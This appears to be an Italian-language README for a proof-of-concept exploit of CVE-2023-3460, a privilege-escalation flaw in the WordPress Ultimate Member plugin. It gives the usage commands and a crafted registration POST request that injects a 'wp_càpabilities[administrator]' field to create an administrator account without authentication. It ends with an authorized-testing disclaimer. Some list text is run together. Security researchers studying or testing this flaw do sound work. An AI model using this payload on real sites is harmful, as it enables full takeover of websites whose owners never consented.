
Exploit proof-of-concept per CVE-2023-3460, una vulnerabilità di escalation dei privilegi in WordPress Ultimate Member. Crea un account amministratore tramite una richiesta di registrazione modificata. Solo per test autorizzati.
Questo è un proof-of-concept (PoC) per CVE-2023-3460, una vulnerabilità critica nel plugin WordPress Ultimate Member. Consente a utenti non autenticati di elevare i propri privilegi ad Amministratore tramite una richiesta di registrazione malevola.
🔥 Impatto: Compromissione completa del sito tramite creazione non autorizzata di account amministratore.
requestsurllib3beautifulsoup4Installa i requisiti:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) dalla pagina di registrazionewp_capabilities con il ruolo administratorPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
Questo script è fornito solo a scopo di test educativo e autorizzato. Lo sfruttamento non autorizzato dei sistemi è illegale e non etico. Utilizzalo solo su sistemi di tua proprietà o per i quali hai il permesso di test.